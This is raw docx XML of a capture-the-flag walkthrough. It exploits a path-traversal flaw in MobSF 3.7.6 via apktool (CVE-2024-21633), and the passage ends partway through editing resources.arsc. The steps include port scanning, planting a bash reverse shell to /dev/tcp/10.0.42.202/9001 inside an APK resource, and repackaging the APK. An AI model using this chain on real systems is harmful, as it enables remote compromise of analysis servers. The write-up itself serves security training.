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gfh3n3fmzl0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w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.7wyr8hyw0mq"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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mob</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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.imebrzwhgnep"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can export the machine’s IP as an environment variable so that we do not have to keep typing the IP address repeatedly. This allows us to use the $IP variable in the following commands as a parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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export IP=&lt;IP_MAQUINA&gt;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begin the CTF by performing a full port scan of the machine using nmap:</w:t>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 -v -T4 -sV -Pn -p- $IP</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identified that ports 22 and 8000 are open:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">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331665" cy="5032613"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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331665" cy="50326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1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.gfqf8qqtp6r6" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1 - Port scan of the machine’s IP reveals ports 22 and 8000 open.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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8000 in the browser, we observe the MobSF application running version 3.7.6 Beta.</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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="29"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733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6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.kblgzckpn3gt" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2 - MobSF version 3.7.6 Beta</w:t>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hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MobSF</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a mobile application security analysis framework. By searching for vulnerabilities in this version on Google, we identify </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CVE-2024-21633</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> , which allows Remote Code Execution (RCE) in MobSF using</w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">apktool</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, as shown in Figure 3.</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A">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285780" cy="4565888"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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285780" cy="45658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B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.m8f2glwqidis" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3 - Vulnerability research on MobSF version 3.7.6</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reviewing how this vulnerability works, we see that MobSF uses apktool to decompile the mobile application uploaded by the user. During decompilation, apktool processes the resources.arsc file (a critical file within an .apk structure) and deduces the output path based on resource names. This behavior enables a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">path traversal </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">attack and consequently RCE.</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pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.wfxcr72cfj4b" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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exploit this vulnerability, we need any .apk file. We can use a simple </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">hello-world</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  application, for example.</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3381375" cy="538150"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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81375" cy="5381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pStyle w:val="Heading3"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.9bclvf4ici4t" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4 - Hello World.apk file</w:t>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For convenience, we rename the file to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">app.apk</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mv Hello\ World.apk app.apk</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decompile the apk and create a raw resource named jadx containing the malicious reverse shell payload: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apktool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apk.apk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>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app/res</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>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mkdir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raw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano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jadx</w:t>
      </w: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write our reverse shell payload, pointing to our VPN IP on port 9001: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#!/bin/bash bash -i &gt;&amp; /dev/tcp/10.0.42.202/9001 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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save the jadx file.</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2733675" cy="712358"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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733675" cy="71235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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.dcy4ns3w85v9" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5 - jadx file containing the reverse shell payload</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recompile the application to generate the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resources.arsc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, and using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jadx-gui</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> we verify that our file has been added.</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cd ../../../ </w:t>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apktool b app -o compiled.apk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ny5w50ys3vxt" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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3351958" cy="1069159"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="33" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="0" l="0" r="43854" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3351958" cy="106915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pStyle w:val="Heading3"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.s2dz9wo1re3e" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6 - Compiling the new app with the malicious resource created</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.g2zmecqph6mm" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>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3771900" cy="2337171"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="32" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="26274" l="0" r="43910" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3771900" cy="233717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F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.2811j395sg4t" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7 - Resource containing the payload visible in compiled.apk along with the resources.arsc file (using jadx-gui)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decompile the file “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">compiled.apk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” with apktool in order to edit resources.arsc. For this, we use the </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ArscEditor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>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apktool d compiled.apk -s -r</w:t>
      </w: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4286250" cy="1078191"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="36"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286250" cy="107819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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.xv17fwfh222c" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 8 - Decompiling “compiled.apk”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:jc w:val="cente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use ArscEditor, simply run the following command in the directory where it was downloaded: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java -jar ArscEditor-1.0.2-all.jar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Then, we open the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resources.arsc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file inside the compiled folder created in the previous step. Expanding the file tree, we can see that the “Value” of the malicious resource we created is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">res/raw/jadx.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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280219" cy="3546713"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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280219" cy="35467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pStyle w:val="Heading3"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.rcmj1rq7n4sl" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 9 - Value of the malicious resource jadx created</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can right-click the resource ID and change the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">field to:  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
